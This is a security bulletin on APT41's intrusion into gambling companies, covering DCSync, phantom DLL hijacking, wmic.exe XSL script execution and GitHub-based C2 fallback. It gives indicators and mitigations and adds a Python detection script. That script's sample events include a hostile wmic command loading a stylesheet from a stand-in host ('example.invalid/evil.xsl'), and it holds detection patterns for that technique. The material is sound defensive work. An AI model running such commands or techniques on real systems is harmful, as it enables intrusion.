Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
Summary:
APT41 (also known as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) carried out a sophisticated intrusion against the gambling and gaming industry. Over a span of six to nine months, the attackers gathered sensitive information such as network configurations, user passwords, and credential material dumped from the LSASS process. They adapted their tooling in response to the security team's countermeasures and maintained persistent access to the network throughout. The activity, which overlaps with the intrusion set Sophos tracks as "Operation Crimson Palace", was financially motivated and relied on tactics that bypassed security software, enabling the theft of intellectual property and financial exploitation. A DCSync attack was used to obtain administrative credentials, broadening the attackers' reach across the domain. The threat actors also used techniques such as Phantom DLL Hijacking and abused the legitimate wmic.exe utility to execute attacker-supplied scripts.
The campaign involved custom malware that connected to a command-and-control (C2) server. When that server was unreachable, the malware scraped GitHub to retrieve fresh C2 information. A later wave of the attack delivered obfuscated JavaScript inside a modified XSL stylesheet, executed through wmic.exe. The final stage profiled infected systems, singling out hosts within a specific VPN subnet by filtering on their IP addresses in order to target the most valuable machines.
Security Officer Comments:
In addition to the tactics summarized above, the attackers leveraged several techniques to ensure persistence and evade detection. One notable method was Phantom DLL Hijacking: rather than replacing an existing library, the attackers planted a malicious DLL under the name of a library that a legitimate Windows process attempts to load but that is absent from disk, so the process loads the attacker's code without any legitimate file being altered. They also relied on Living-off-the-Land Binaries (LOLBins) such as wmic.exe to run malicious scripts while blending in with normal system activity. Finally, they implemented a C2 fallback mechanism that derived new C2 addresses by scraping GitHub, reading specific capital letters from user profiles and decoding them into an IP address. This gave their infrastructure flexibility and redundancy, making it harder for defenders to block or sinkhole communications.
Suggested Corrections:
- Monitor and restrict any attempt to modify XSL files in the default Windows folder C:\Windows\SysWOW64\wbem.
- Monitor any attempt to use custom XSL files with the WMIC.exe utility. Validate the path of the XSL file passed in the /FORMAT parameter, ensuring it is approved by your organization and has been analyzed beforehand.
- Block all traffic to the domain time[.]qnapntp[.]com and the IP addresses 23[.]163[.]0[.]12 and 192[.]169[.]7[.]135.
- Monitor the usage of remote named pipes to detect lateral movement. C2 frameworks that implement SMB beaconing often rely on this resource to connect even in environments without direct internet connectivity.
- Monitor modifications of the registry key SYSTEM\ControlSet001\Services\LanmanServer\Parameters, especially when values such as NullSessionPipes and RestrictNullSessAccess are set.
- Block any TCP traffic over port 443 that does not comply with the standard HTTPS protocol.
- Build custom rules in your EDR to detect and block the execution of any process that shares the process hierarchy described in the source report (see the links below).
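The following Python script, added here as an illustration and not part of the Security Joes or The Hacker News material, applies the first, second and fifth recommendations above to a handful of constructed, Sysmon-style events (process-creation, file-write and registry-set records). The event shape, the stylesheet allowlist, and every path, user and command line in the sample data are assumptions; the part worth copying is the handling of the WMIC /FORMAT argument, which may be quoted or unquoted, a bare keyword, a local path, a UNC path or a URL.

```python
"""Offline triage of constructed Windows telemetry for the WMIC/XSL, XSL-file
and LanmanServer registry checks above. Added example, not from the report;
event shapes, paths, users and the allowlist are assumptions."""
import re
from pathlib import PureWindowsPath

# Assumed organisational allowlist of stylesheets WMIC may load by explicit path.
# A real deployment would build this from approved, hash-verified files.
APPROVED_XSL = {
    PureWindowsPath(r"C:\Windows\System32\wbem\csv.xsl"),
    PureWindowsPath(r"C:\Windows\SysWOW64\wbem\csv.xsl"),
    PureWindowsPath(r"C:\Windows\System32\wbem\htable.xsl"),
    PureWindowsPath(r"C:\Windows\SysWOW64\wbem\htable.xsl"),
}
WBEM_DIRS = {PureWindowsPath(r"C:\Windows\System32\wbem"),
             PureWindowsPath(r"C:\Windows\SysWOW64\wbem")}
NULL_SESSION_VALUES = {"nullsessionpipes", "restrictnullsessaccess"}

# /FORMAT:value, value optionally double-quoted; WMIC switches are case-insensitive.
FORMAT_RE = re.compile(r'/format:(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def extract_format_arg(cmdline):
    """Return the raw /FORMAT argument of a WMIC command line, or None."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def check_wmic_format(event):
    """Flag WMIC runs whose /FORMAT names a stylesheet that is remote or not approved."""
    if PureWindowsPath(event["image"]).name.lower() != "wmic.exe":
        return None
    arg = extract_format_arg(event["cmdline"])
    if arg is None:
        return None
    if re.match(r"(?i)^(https?|ftp)://", arg) or arg.startswith("\\\\"):
        return f"wmic loads remote XSL stylesheet: {arg}"
    if "\\" in arg or "/" in arg or arg.lower().endswith(".xsl"):
        # PureWindowsPath compares case-insensitively, as the file system does.
        if PureWindowsPath(arg) in APPROVED_XSL:
            return None
        return f"wmic loads custom XSL stylesheet not on allowlist: {arg}"
    # A bare keyword (csv, list, htable, ...) resolves to a stock stylesheet in the
    # wbem folder; tampering with those files is caught by check_xsl_write instead.
    return None


def check_xsl_write(event):
    """Flag writes to .xsl files inside the wbem folders (stock stylesheet tampering)."""
    p = PureWindowsPath(event["path"])
    if p.suffix.lower() == ".xsl" and p.parent in WBEM_DIRS:
        return f"XSL stylesheet modified in wbem folder by {event['user']}: {p}"
    return None


def check_lanman_registry(event):
    """Flag changes to the null-session settings of the LanmanServer service."""
    key = event["key"].lower()
    if re.search(r"\\(controlset\d{3}|currentcontrolset)\\services\\lanmanserver\\parameters$", key) \
            and event["value"].lower() in NULL_SESSION_VALUES:
        return f"LanmanServer {event['value']} set to {event['data']!r}"
    return None


CHECKS = {"process": check_wmic_format, "file": check_xsl_write,
          "registry": check_lanman_registry}


def triage(events):
    """Run the check matching each event's type; return (index, reason) for every hit."""
    alerts = []
    for i, ev in enumerate(events):
        check = CHECKS.get(ev["type"])
        reason = check(ev) if check else None
        if reason:
            alerts.append((i, reason))
    return alerts


WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
LANMAN = r"HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters"
# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "image": WMIC,
     "cmdline": r'wmic os get /FORMAT:"C:\Windows\SysWOW64\wbem\custom.xsl"'},
    {"type": "process", "image": WMIC,
     "cmdline": r"wmic process list /format:C:\Windows\System32\wbem\csv.xsl"},
    {"type": "process", "image": WMIC, "cmdline": r"wmic process list /format:csv"},
    {"type": "process", "image": WMIC,
     "cmdline": r"wmic os get /format:https://example.invalid/evil.xsl"},
    {"type": "file", "path": r"C:\Windows\SysWOW64\wbem\csv.xsl", "user": "DOMAIN\\svc_backup"},
    {"type": "file", "path": r"C:\Users\alice\Documents\report.xsl", "user": "DOMAIN\\alice"},
    {"type": "registry", "key": LANMAN, "value": "NullSessionPipes", "data": "evilpipe"},
    {"type": "registry", "key": LANMAN, "value": "Size", "data": "3"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]

if __name__ == "__main__":
    for i, reason in triage(SAMPLE_EVENTS):
        print(f"event {i}: {reason}")
```

Events 0, 3, 4 and 6 fire; event 1 passes because its path is on the allowlist, and event 2 is deliberately not flagged by the WMIC check, because a built-in keyword only becomes dangerous once the stock stylesheet it maps to has been modified, which the file-write check covers.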
Link(s):
https://thehackernews.com/2024/10/chinese-nation-state-hackers-apt41-hit.html
https://www.securityjoes.com/post/t...ted-threat-actors-targeting-gambling-industry